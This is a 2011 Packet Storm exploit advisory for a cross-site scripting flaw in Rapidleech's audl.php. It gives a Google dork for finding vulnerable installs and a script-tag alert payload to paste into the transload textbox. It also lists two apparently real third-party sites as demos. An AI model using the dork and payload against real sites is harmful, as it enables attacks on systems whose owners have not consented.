Rapidleech Cross Site Scripting

2011-12-30T00:00:00
ID PACKETSTORM:108239
Type packetstorm
Reporter Farbod Mahini
Modified 2011-12-30T00:00:00

Description

                                        
                                            `############################################################################  
# Exploit Title: Rapidleech <= (audl.php) Cross Site Scripting   
# Google Dork: inurl:"audl.php" or intitle:"Rapidleech"  
# Date: 20/12/2011  
# Author: H4ckCity Security Team  
# Discovered By: farbodmahini  
# Home: WwW.H4ckCity.Org   
# Software Link: http://dl.p30vel.ir/RapidLeech-pre_release-for_v43-Rev_397.zip  
# Version: All Version  
# Security Risk:: Low  
# Tested on: GNU/Linux Ubuntu - Windows Server  
############################################################################  
# Exploit:  
#   
# Go To This :http://target.com/audl.php  
#  
# Enter In TextBox <script>alert(/farbodmahini/)</script> and click on   
# Transload files.  
#  
#   
# Demo:  
#  
# http://www.gigaleecher.com/audl.php  
# http://aeon.zonyx.tv/audl.php  
#  
############################################################################  
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-   
# nitrojen90-K0242-kingcope-Mr.M4st3r , ...  
############################################################################  
GreetZ : All H4ckCity Member - BHG members  
############################################################################  
`